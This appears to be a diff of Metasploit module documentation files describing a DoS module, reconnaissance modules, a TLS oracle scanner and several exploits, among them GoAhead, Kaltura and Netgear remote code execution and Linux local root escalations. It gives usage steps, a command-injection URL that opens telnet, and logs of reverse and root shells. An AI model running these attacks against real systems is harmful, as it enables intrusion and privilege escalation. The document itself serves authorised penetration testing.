+msf5 > use auxiliary/dos/tcp/claymore_dos
+msf5 auxiliary(dos/tcp/claymore_dos) > show options
+
+Module options (auxiliary/dos/tcp/claymore_dos):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   rhost                   yes       The target address
+   rport  3333             yes       The target port
+
+msf5 auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(dos/tcp/claymore_dos) > run
+
+[*] Starting server...
+[*] Creating sockets...
+[*] Auxiliary module execution completed
+```
+
+

documentation/modules/auxiliary/gather/censys_search.md

@@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
 ## Verification Steps
 
 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
+2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
 4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK rapid7`
+5: Do: `set CENSYS_DORK query`
 6: Do: `run`
 
 ## Scenarios

documentation/modules/auxiliary/gather/shodan_honeyscore.md

@@ -1,8 +1,9 @@
-The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not. 
-When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/. 
+## Introduction
+The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
+When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
 
-#### NOTE: 
-In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
+#### NOTE:
+In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
 
 ## Verification Steps
 
@@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
   3. Do: `set TARGET <targetip>`
   4. Do: `set SHODAN_APIKEY <your apikey>`
   5. Do: `run`
-  6. If the API is up, you should recieve a score from 0.0 to 1.0.
+  6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
 
 ## Options
 
   **TARGET**
-  
+
   The remote host to request the API to scan.
-  
+
   **SHODAN_APIKEY**
 
-  This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
-  
+  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
+
 
 ## Scenarios
 

documentation/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.md

@@ -6,7 +6,7 @@ While the application is based in java, I was only able to get it to exploit aga
 
   [official site](http://cftp.coldcore.com/files/coloradoftp-prime-8.zip?site=cft1&rv=19.1&nc=1) or [github backup](https://github.com/h00die/MSF-Testing-Scripts/raw/master/coloradoftp-prime-8.zip)
   
-When installing, you must edit conf/beans.xml line 182 "localIp" to put in your IP or else `pasv` won't work.
+When installing, you must edit conf/beans.xml line 183 "remoteIp" to put in your IP or else `pasv` won't work.
 
 ## Verification Steps
 

documentation/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.md

@@ -0,0 +1,72 @@
+Some TLS implementations handle errors processing RSA key exchanges and encryption (PKCS #1 v1.5 messages) in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when the TLS server does not strictly check message formatting and needs less than a million requests on average to decode a given ciphertext. A weak oracle server strictly checks message formatting and often requires many more requests to perform the attack.
+
+## Vulnerable Applications
+
+* F5 BIG-IP 11.6.0-11.6.2 (fixed in 11.6.2 HF1), 12.0.0-12.1.2 HF1 (fixed in 12.1.2 HF2), or 13.0.0-13.0.0 HF2 (fixed in 13.0.0 HF3) (CVE 2017-6168)
+* Citrix NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 (CVE 2017-17382)
+* Radware Alteon firmware 31.0.0.0-31.0.3.0 (CVE 2017-17427)
+* Cisco ACE (CVE 2017-17428)
+* Cisco ASA 5500 series (CVE 2017-12373)
+* Bouncy Castle TLS < 1.0.3 configured to use the Java Cryptography Engine (CVE 2017-13098)
+* Erlang  < 20.1.7, < 19.3.6.4, < 18.3.4.7 (CVE 2017-1000385)
+* WolfSSL < 3.12.2 (CVE 2017-13099)
+* MatrixSSL 3.8.3 (CVE 2016-6883)
+* Oracle Java <= 7u7, <= 6u35, <= 5u36, <= 1.4.2_38  (CVE 2012-5081)
+* IBM Domino
+* Palo Alto PAN-OS
+
+(source: [https://robotattack.org/#patches](https://robotattack.org/#patches))
+
+## Extra requirements
+
+This module requires a working Python 3 install with the `cryptography` and `gmpy2` packages installed (e.g. via `pip3 install cryptography gmpy2`).
+
+## Verification Steps
+
+Perhaps the easiest way to reproduce is to install an older version of Erlang on Linux (the stock `erlang` package on Ubuntu 17.10 and before is unpatched), and run the [ssl_hello_world](https://github.com/ninenines/cowboy/tree/master/examples/ssl_hello_world) example from Cowboy (additionally requires `git` and `make`, be sure to use the 1.1.x branch for Erlang < 19).
+
+```
+msf4 > use auxiliary/scanner/ssl/robot 
+msf4 auxiliary(scanner/ssl/robot) > set RHOSTS 192.168.244.128
+RHOSTS => 192.168.244.128
+msf4 auxiliary(scanner/ssl/robot) > set RPORT 8443
+RPORT => 8443
+msf4 auxiliary(scanner/ssl/robot) > set VERBOSE true
+VERBOSE => true
+msf4 auxiliary(scanner/ssl/robot) > run
+
+[*] Running for 192.168.244.128...
+[*] 192.168.244.128:8443 - Scanning host for Bleichenbacher oracle
+[*] 192.168.244.128:8443 - RSA N: 0xcdb5b51a3102cc751cfd6493a8b8801aa8c235c711e6c6954beca8cf648f461a68c9fd3fa81ad7e41634b739a0a33a138917c4e300a2543f7d09cf83ae9fc5338f6be04a59768708a2fa6b98e9affe0c24a23f79cda03a3ca367d4e7660e9da1c09b17d999b79296c65194f18c392471c9a051be048cbeea347abbb1a42d8af5
+[*] 192.168.244.128:8443 - RSA e: 0x10001
+[*] 192.168.244.128:8443 - Modulus size: 1024 bits, 128 bytes
+[+] 192.168.244.128:8443 - Vulnerable: (strong) oracle found TLSv1.2 with standard message flow
+[*] 192.168.244.128:8443 - Result of good request:                        TLS alert 10 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 1 (wrong first bytes):   TLS alert 51 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 2 (wrong 0x00 position): TLS alert 10 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 3 (missing 0x00):        TLS alert 51 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 4 (bad TLS version):     TLS alert 10 of length 7
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf4 auxiliary(scanner/ssl/robot) > 
+```
+
+## Options
+
+The scanner takes the normal `RHOSTS` and `RPORT` options to specify the hosts to scan on the port on which to scan them. In addition, it takes two options for the TLS behaviour: `cipher_group` and `timeout`.
+
+The `cipher_group` option:
+
+Select the ciphers to use to negotiate: all TLS_RSA ciphers (`all`, the default), TLS_RSA_WITH_AES_128_CBC_SHA (`cbc`), or TLS-RSA-WITH-AES-128-GCM-SHA256 (`gcm`).
+
+```
+set cipher_group gcm
+```
+
+The `timeout` option:
+
+Set the interval to wait before considering the TLS connection timed out. The default is 5 seconds.
+
+```
+set timeout 10
+```

documentation/modules/exploit/linux/http/goahead_ldpreload.md

@@ -0,0 +1,121 @@
+## Vulnerable Application
+
+  The GoAhead httpd server between versions 2.5 and 3.6.4 are vulnerable to an arbitrary code execution
+  vulnerability where a remote attacker can force a supplied shared library to be loaded into the process
+  of a CGI application. This module delivers a shared library payload as the raw data to a POST request
+  and forces this to be loaded by specifying a `LD_PRELOAD` value of `/proc/self/fd/0`.
+
+### Kali 2017.3 and Ubuntu 16.04 Install Instructions
+
+These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)
+
+```
+git clone https://github.com/embedthis/goahead.git
+cd goahead/
+git checkout tags/v3.6.4 -q
+make > /dev/null
+cd test
+gcc ./cgitest.c -o cgi-bin/cgitest
+../build/linux-x64-default/bin/goahead . 127.1.1.1:8080
+```
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/goahead_ldpreload```
+  4. Do: ```set rhost [ip]```
+  5. Do: ```exploit```
+  6. You should get a shell.
+
+## Options
+
+  **TARGET_URI**
+
+  Optional. The full path to a CGI endpoint on the target server.
+
+## Scenarios
+
+### GoAhead 3.6.4 on Ubuntu 16.04 x64
+
+```
+
+msf> use exploit/linux/http/goahead_preload
+msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1
+msf exploit(goahead_ldpreload) > set RPORT 8080
+msf exploit(goahead_ldpreload) > check
+
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[+] 127.1.1.1:8080 The target is vulnerable.
+
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+exit
+
+msf exploit(goahead_ldpreload) > set TARGET 1
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[*] Started bind handler
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+exit
+
+msf exploit(goahead_ldpreload) > set TARGET 2
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP double handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo sNRXNjxWl7ic0uWw;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "sNRXNjxWl7ic0uWw\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+
+msf exploit(goahead_ldpreload) > set TARGET 4
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+```
+
+
+## Logging
+
+Each 404 error will generate a console or log entry similar to `goahead: 0: Cannot find CGI program:`.

documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md

@@ -0,0 +1,42 @@
+## Description 
+
+The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie. 
+ 
+
+## Vulnerable Application
+
+ This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
+ Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143.
+ Installation of Kaltura is difficult, but here is an installation guide:
+ https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md
+
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. `use exploit/linux/http/kaltura_unserialize_cookie_rce`
+ 3. `set RHOST https://example.com (or IP address)`
+ 4. `set ENTRYID 0_xxxxxxxx`
+ 5. `set payload generic/custom`
+ 6. `set payloadstr "system('command you want to execute, eg.- ls -la');"`
+ 7. `run`
+
+## Scenarios
+
+ ```
+ msf use exploits/linux/http/kaltura_unserialize_cookie_rce
+ msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
+ RHOST => 46.101.209.202
+ msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
+ LHOST => 192.168.1.16
+ msf exploit(kalkutra_unseialize_cookie_rce)>check
+ [+] 46.101.209.202:4444 The target is vulnerable.
+ msf exploit(kalkutra_unseialize_cookie_rce)>run
+ [*] Started bind handler
+ [*] Output:
+ [*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  ```
+

documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md

@@ -7,8 +7,8 @@
   1. start `msfconsole`
   2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
   3. `set RHOST 192.168.1.1` `<--- Router IP`
-  4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
-  5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
+  4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
+  5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
   5. `set PAYLOAD cmd/unix/reverse_bash`
   6. `set LHOST 192.168.1.x`
   7. `set LPORT xxxx`

documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md

@@ -1,4 +1,5 @@
-The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
+## Introduction
+The `netgear_r7000_cgibin_exec` module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
 
 
 ## Vulnerable Application

documentation/modules/exploit/linux/local/abrt_raceabrt_priv_esc.md

@@ -0,0 +1,73 @@
+## Description
+
+  This module attempts to gain root privileges on Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler.
+
+
+## Vulnerable Application
+
+  A race condition in ABRT allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes.
+
+  This module has been tested successfully on ABRT packaged versions:
+
+  * 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
+  * 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
+  * 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
+
+  Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/abrt_raceabrt_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **USERNAME**
+
+  Username for the new UID=0 user (default: random)
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/local/abrt_raceabrt_priv_esc 
+  msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
+  session => 1
+  msf exploit(linux/local/abrt_raceabrt_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [*] Writing '/tmp/.C17d3UYQy' (64240 bytes) ...
+  [*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
+  [+] Success! '/etc/passwd' is writable
+  [*] Adding pauITBusGM user to /etc/passwd ...
+  [*] Writing '/tmp/.u8zOz4c' (207 bytes) ...
+  [*] Sending stage (857352 bytes) to 172.16.191.137
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:38938) at 2018-02-03 21:29:56 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : localhost.localdomain
+  OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+

documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md

@@ -0,0 +1,73 @@
+## Description
+
+  This module attempts to gain root privileges on Ubuntu and Fedora systems by invoking the default coredump handler inside a namespace ("container").
+
+
+## Vulnerable Application
+
+  Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing `usr/share/apport/apport` within the crashed task's directory to be executed.
+
+  Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be executed. Fedora's crash handler was reportedly configured to chroot ABRT by default between April and August 2014.
+
+  In both instances, the crash handler does not drop privileges, resulting in code execution as root.
+
+  This module has been tested successfully on:
+
+  * Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64
+  * ABRT on Fedora 19 and 20 x86_64
+
+  To test Fedora 20, disable SELinux, reboot, and modify `/proc/sys/kernel/core_pattern` to make use of the vulnerable `core_pattern` : `|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e`
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/apport_abrt_chroot_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new root session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/local/apport_abrt_chroot_priv_esc
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > set session 1
+  session => 1
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [*] Writing '/tmp/.drY6cJZ' (887316 bytes) ...
+  [*] Writing '/tmp/.LtJvrgjXq' (207 bytes) ...
+  [*] Launching exploit...
+  [+] Upgraded session to root privileges ('uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(user)')
+  [*] Sending stage (857352 bytes) to 172.16.191.252
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.252:35552) at 2018-01-11 09:58:25 -0500
+  [+] Deleted /tmp/.drY6cJZ
+  [+] Deleted /tmp/.LtJvrgjXq
+
+  meterpreter > getuid
+  Server username: uid=0, gid=1000, euid=0, egid=1000
+  meterpreter > sysinfo
+  Computer     : 172.16.191.252
+  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+

documentation/modules/exploit/linux/local/glibc_ld_audit_dso_load_priv_esc.md

@@ -0,0 +1,72 @@
+## Description
+
+  This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker to load arbitrary shared objects.
+
+
+## Vulnerable Application
+
+  glibc `ld.so` in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the `LD_AUDIT` environment variable when loading setuid executables. This allows loading arbitrary shared objects from the trusted library search path with the privileges of the suid user.
+
+  This module uses `LD_AUDIT` to load the `libpcprofile.so` shared object, distributed with some versions of glibc, and leverages arbitrary file creation functionality in the library constructor to write a root-owned world-writable file to a system trusted search path (usually `/lib`). The file is then overwritten with a shared object then loaded with `LD_AUDIT` resulting in arbitrary code execution.
+
+  This module has been tested successfully on:
+
+  * glibc version 2.11.1 on Ubuntu 10.04 (x86_64)
+  * glibc version 2.7 on Debian 5.0.4 (i386)
+
+  RHEL 5 is reportedly affected, but untested.
+
+  Some glibc distributions do not contain the `libpcprofile.so` library required for successful exploitation.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 
+  msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 1
+session => 1
+  msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [+] The target appears to be vulnerable
+  [*] Using target: Linux x64
+  [*] Writing '/tmp/.GQh1C8euY' (1913 bytes) ...
+  [*] Writing '/tmp/.3l76zsoHT' (246 bytes) ...
+  [*] Writing '/tmp/.WSuOVyo' (207 bytes) ...
+  [*] Launching exploit...
+  [*] Sending stage (857352 bytes) to 172.16.191.149
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.149:45721) at 2018-01-27 23:59:36 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.149
+  OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+

documentation/modules/exploit/linux/local/glibc_origin_expansion_priv_esc.md

@@ -0,0 +1,75 @@
+## Description
+
+  This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker - aka glibc `$ORIGIN` expansion vulnerability.
+
+
+## Vulnerable Application
+
+  glibc `ld.so` in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the `LD_AUDIT` environment variable when loading setuid executables. This allows control over the `$ORIGIN` library search path resulting in execution of arbitrary shared objects.
+
+  This module opens a file descriptor to the specified suid executable via a hard link, then replaces the hard link with a shared object before instructing the linker to execute the file descriptor, resulting in arbitrary code execution.
+
+  The specified setuid binary must be readable and located on the same file system partition as the specified writable directory.
+
+  This module has been tested successfully on:
+
+  * glibc 2.5 on CentOS 5.4 (x86_64)
+  * glibc 2.5 on CentOS 5.5 (x86_64)
+  * glibc 2.12 on Fedora 13 (i386, x86_64)
+
+  RHEL 5 is reportedly affected, but untested.
+
+  Some versions of `ld.so`, such as the version shipped with Ubuntu 14, hit a failed assertion in `dl_open_worker` causing exploitation to fail.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/glibc_origin_expansion_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/local/glibc_origin_expansion_priv_esc 
+  msf exploit(linux/local/glibc_origin_expansion_priv_esc) > set session 1
+  session => 1
+  msf exploit(linux/local/glibc_origin_expansion_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [+] The target appears to be vulnerable
+  [*] Using target: Linux x86
+  [*] Writing '/tmp/.R5Ork' (1279 bytes) ...
+  [*] Writing '/tmp/.yE35DWbLd' (320 bytes) ...
+  [*] Writing '/tmp/.sk7Z3Vl7vJ' (207 bytes) ...
+  [*] Launching exploit...
+  [*] Sending stage (857352 bytes) to 172.16.191.138
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.138:59187) at 2018-01-27 04:21:24 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : fedora13.localdomain
+  OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
+  Architecture : i686
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+

documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md

@@ -0,0 +1,138 @@
+## Description
+
+  This module attempts to gain root privileges on Juju agent systems running the juju-run agent utility.
+
+  Juju agent systems running agent tools prior to version 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket to manage software ("units") without setting appropriate permissions, allowing unprivileged local users to execute arbitrary commands as root.
+
+
+## Vulnerable Application
+
+  [Juju](https://juju.ubuntu.com/) is an open source application modeling tool designed for devops to deploy, configure, scale, and operate software on public and private clouds.
+
+  * Homepage: https://juju.ubuntu.com/
+  * Github: https://github.com/juju/juju
+
+  This module has been tested successfully with Juju agent tools:
+
+  * Versions 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86
+
+  Deployed by Juju:
+
+  * Versions 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64
+
+
+## Installation
+
+  Two systems are required. The first runs Juju and the second runs the Juju agent tools.
+
+  Ensure the client system has SSH installed and network accessible.
+
+  The following installation instructions are for Ubuntu 14.04.1 LTS ("trusty").
+
+  ```sh
+  # List avilable juju packages
+  apt-cache showpkg juju
+
+  # Install a vulnerable package
+  apt-get install juju-core=1.18.1-0ubuntu1
+
+  # Generate a config file
+  juju init
+  ```
+
+  Edit the `manual` section of the newly generated config file, adding the appropriate `bootstrap-host` and `bootstrap-user` for the client system, ensuring the appropriate `default-series` is set (`trusty` for Ububtu 14.x).
+
+  ```
+  manual:
+    bootstrap-host: juju-client.local # Remote host
+    bootstrap-user: user              # User for SSH access
+    default-series: trusty            # Remote host OS series
+  ```
+
+  Switch to the `manual` environment and bootstrap the remote host specified above:
+
+  ```sh
+  juju switch manual
+  juju bootstrap
+  ```
+
+  Once the bootstrapping is complete, check if it was successful. You should see a machine with ID# 0:
+
+  ```sh
+  juju stat
+  ```
+
+  Deploy any unit to the machine with ID# 0. Units can be found in the [Juju store](https://jujucharms.com/store).
+
+  ```sh
+  juju deploy zabbix-agent --to 0
+  ```
+
+  Check if it worked:
+
+  ```sh
+  watch juju stat
+  ```
+
+
+  Optionally, to test various versions of the juju agent utilities, the juju tools can be updated remotely. (Note: Downgrading is more difficult.)
+
+  ```sh
+  # You may or may not need to `set-env` the upstream tools URL:
+  juju set-env agent-metadata-url=https://streams.canonical.com/juju/tools
+  juju set-env agent-stream=proposed
+
+  # Be careful to select a version which exists, otherwise bad things will happen.
+  juju upgrade-juju --version 1.25.2
+  ```
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/juju_run_agent_priv_esc`
+  4. Do: `set SESSION [SESSION]`
